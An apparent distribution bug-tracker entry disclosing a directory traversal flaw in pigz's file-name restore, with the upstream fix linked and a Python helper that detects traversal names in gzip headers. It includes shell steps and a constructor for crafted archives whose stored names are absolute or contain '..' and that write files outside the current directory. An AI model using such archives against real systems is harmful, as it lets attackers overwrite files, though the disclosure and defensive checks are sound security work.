From ${URL} :

pigz is susceptible to directory traversal vulnerabilities. While decompressing a file with restoring the file name, it (unlike gzip) will happily use absolute and relative paths taken from the input. This can be exploited by a malicious archive to write files outside the current directory.

1. Absolute path. A sample could be prepared in the following way:

    $ touch XtmpXabs
    $ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
    $ rm XtmpXabs

Then check it works:

    $ ls /tmp/abs
    ls: cannot access /tmp/abs: No such file or directory
    $ unpigz -N abs.gz
    $ ls /tmp/abs
    /tmp/abs

2. Relative path with "..". A sample could be prepared in the following way:

    $ rm ../rel
    $ touch XXXrel
    $ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
    $ rm XXXrel

Then check it works:

    $ ls ../rel
    ls: cannot access ../rel: No such file or directory
    $ unpigz -N rel.gz
    $ ls ../rel
    ../rel

fix: https://github.com/madler/pigz/commit/fdad1406b3ec809f4954ff7cdf9e99eb18c2458f

@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
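As an added example (not from the bug report, pigz, or the linked fix), the Python below parses the FNAME field of a gzip member header (RFC 1952), flags the two cases from the report (absolute path, ".." component) before anything is written, and shows the basename-only restore that gzip applies for -N; `make_member` builds the sample archives in-process instead of via the sed trick, since the stdlib gzip writer only stores basenames.

```python
import os
import struct
import zlib

FEXTRA, FNAME = 0x04, 0x08          # RFC 1952 FLG bits that affect header layout


def stored_name(gz):
    """Return the FNAME field of a gzip member header, or None if absent.
    Only the fixed header and the FEXTRA block are walked; the deflate
    payload is never decompressed, so this can be run before extraction."""
    if len(gz) < 10 or gz[:2] != b"\x1f\x8b" or gz[2] != 8:
        raise ValueError("not a gzip member")
    flg, pos = gz[3], 10
    if flg & FEXTRA:                                # skip XLEN + subfields
        (xlen,) = struct.unpack_from("<H", gz, pos)
        pos += 2 + xlen
    if not flg & FNAME:
        return None
    return gz[pos:gz.index(b"\x00", pos)].decode("latin-1")


def is_traversal(name):
    """True if restoring `name` verbatim could land outside the cwd:
    an absolute path, or any '..' path component."""
    return os.path.isabs(name) or ".." in name.split("/")


def safe_restore_name(name):
    """What gzip's -N effectively uses: the last path component only."""
    return name.rstrip("/").rsplit("/", 1)[-1]


def make_member(name, payload):
    """Constructed sample: a gzip member carrying an arbitrary FNAME
    (header assembled by hand; MTIME=0, XFL=0, OS=3 'Unix')."""
    header = b"\x1f\x8b\x08" + bytes([FNAME]) + b"\x00" * 4 + b"\x00\x03"
    header += name.encode("latin-1") + b"\x00"
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw deflate body
    body = comp.compress(payload) + comp.flush()
    trailer = struct.pack("<II", zlib.crc32(payload) & 0xFFFFFFFF, len(payload))
    return header + body + trailer


def inspect(gz):
    """(stored name, flagged as traversal?, name a hardened -N would use)."""
    zlib.decompress(gz, 16 + zlib.MAX_WBITS)      # sanity: member is well-formed
    name = stored_name(gz) or ""
    return name, is_traversal(name), safe_restore_name(name)
```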
app-arch/pigz-2.3.3 in tree and stable. No vulnerable versions in tree. Fix link in previous comment. GLSA Vote: No